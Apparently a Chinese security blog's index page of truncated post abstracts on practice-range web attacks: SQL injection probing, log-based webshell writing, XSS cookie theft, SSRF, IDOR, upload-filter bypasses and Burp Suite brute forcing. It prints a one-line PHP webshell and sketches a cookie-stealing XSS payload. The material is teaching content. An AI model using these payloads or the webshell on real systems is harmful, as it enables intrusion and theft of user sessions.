摘要:
看到新闻中心是一个动态页面,用id传参,然后就尝试一下SQL注入 and 1=1页面显示正常 and 1=2页面显示异常,所以判断存在SQL注入漏洞 然后看到文件后缀是.aspx,初步判断是Access库,但是用#注释页面还是回显正常,就暂定是Access,接着试 发现当使用order by 1想要 阅读全文
|
摘要:
看到新闻中心是一个动态页面,用id传参,然后就尝试一下SQL注入 and 1=1页面显示正常 and 1=2页面显示异常,所以判断存在SQL注入漏洞 然后看到文件后缀是.aspx,初步判断是Access库,但是用#注释页面还是回显正常,就暂定是Access,接着试 发现当使用order by 1想要 阅读全文
摘要:
--这里是暂时没找到合适的靶场,所以就用自己的数据库做一个原理演示 日志写马我们需要用到堆叠注入,也就是用 ; 连接多个SQL语句依次执行,但是一般的后端执行SQL语句使用的函数都是mysqli_query(),这个函数是不能使用堆叠注入的,很少用到mysqli_multi_query() Mysq 阅读全文
摘要:
用了那么多平台,今天想自己研究一下攻击过程 话不多说,先上受害者 显然这里可能存在XSS 用弹窗试了一下,果不其然 自己写了两行代码,实现获取URL里面的cookie参数,然后将cookie写入一个新的文件cookie.txt中 然后构造payload <script> document.locat 阅读全文
摘要:
SSRF(Sever-Side Request Forgery)服务器端请求伪造对比CSRF: SSRF ==>> 让服务器帮我们发送数据(欺骗服务器) CSRF ==>> 利用JS代码让浏览器发送数据(欺骗浏览器) 具体有什么作用呢? 1、探测内网 2、做攻击跳板(借刀sha人) 3、探测“本机” 阅读全文
摘要:
越权漏洞是什么? 答:应用在检查授权时存在纰漏,使得攻击者在获得低权限用户帐后后,可以利用一些方式绕过权限检查,访问或者操作到原本无权访问的高权限功能。 所以我们在提交带有身份信息的数据包的时候要关注id、user、uid、admin之类的变量。 接下来我们来到靶场:这是一个报修系统,amy和jac 阅读全文
摘要:
上面讲过了黑名单绕过,白名单就是只允许规定的文件后缀能上传,所以要比黑名单安全 一、%00绕过(.php终止符.jpg) 原理:白名单过滤肯定是从后往前读取后缀,所以读取到.jpg在白名单里就放通了。 但是在调用文件的时候读取文件名是从前往后读,所以看到.php后面的终止符的时候就停止读取了,最终读 阅读全文
摘要:
一句话木马:<?php eval($_REQUEST[8])?> 1、前端验证绕过 前端对文件的后缀进行了筛选,只允许.jpg .png .gif后缀的文件上传,所以就直接上传.jpg的图片马,然后抓包,将文件后缀改为.php 还有一种更完美的方式 1、先查看网页源码,然后复制到记事本中 2、在记事 阅读全文
摘要:
三大数据库 Access:1、没有系统自带表,想要知道表名只能爆破【and exist(select*from table_name)】或者猜一些常用的表名such as news、admin、user2、不能直接select 1,2,3 必须要接表名 ==>> select 1,2,3 from 阅读全文
摘要:
0这次我们来整理一下一些常见的SQL注入方法(按传参方式分) 一、GET注入(俗称显错注入) 一般就是能看到URL栏里面有 ?id=1 的字样就可以尝试一下是否有注入点 1、id=1 and 1=1页面正常,id=1 and 1=2页面报错 ==>> 页面存在注入点 2、id=1 order by 阅读全文
摘要:
引言:Brup Suite作为一个黑客工具,众所周知它是一个抓包工具,其实除了抓包,他还有很多很强大的功能比如说我们都喜欢的——“爆破” 这个是某学院的靶场,今天就用这个来操作一下 首先呢,要使用Brup Suite,你得需要拥有这个软件,网上就有免费的社区版可以下载,你要是想用专业版的,也是有破解 阅读全文
|